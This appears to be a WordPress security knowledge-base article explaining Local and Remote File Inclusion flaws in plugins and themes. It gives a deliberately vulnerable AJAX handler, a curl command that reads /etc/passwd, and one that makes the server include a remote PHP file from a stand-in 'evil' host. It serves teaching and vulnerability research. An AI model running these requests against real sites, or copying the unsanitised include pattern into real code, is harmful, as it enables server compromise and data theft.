Local File Inclusion (LFI)
Introduction
This article covers cases of possible LFI on WordPress. This includes improper file inclusion inside of the plugin/theme which can be used to gain RCE on the server.
Useful Functions
Several functions could be useful to identify a possible LFI vulnerability:
Example Cases
Below is an example of vulnerable code:
add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");
function render_lesson_template(){ $template_path = urldecode( $_GET['template_path'] ?? '' );
// For custom template return all list of lessons include $template_path; die();}
To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php
endpoint specifying the needed parameter to trigger the include
function.
curl <WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=/etc/passwd
Below are some of the findings related to Local File Inclusion:
- Critical Vulnerabilities Patched in REHub Theme and Plugin
- Security Vulnerability In OceanWP Theme <= 3.4.1
- Vulnerability In Rank Math SEO Plugin
- Multiple Critical Vulnerabilities Fixed In LearnPress Plugin Version <= 4.1.7.3.2
Remote File Inclusion
If both the PHP options allow_url_fopen
and allow_url_include
are turned on in the PHP configuration, a remote file inclusion is possible which allows an even easier access to executing arbitrary PHP code on the server. It allows a malicious user to add the remote PHP file to be executed leading to code execution unlike LFI where a local file needs to be available.
Example Cases
Similar to the above case, below is an example vulnerable scenario if the mentioned options are enabled in the PHP configuration:
add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");
function render_lesson_template(){ $template_path = urldecode( $_GET['template_path'] ?? '' );
// For custom template return all list of lessons include $template_path; die();}
To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php
endpoint specifying the external link to the PHP code to trigger the include
function.
curl <WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=https://example.com/evil-file.php
Contributors

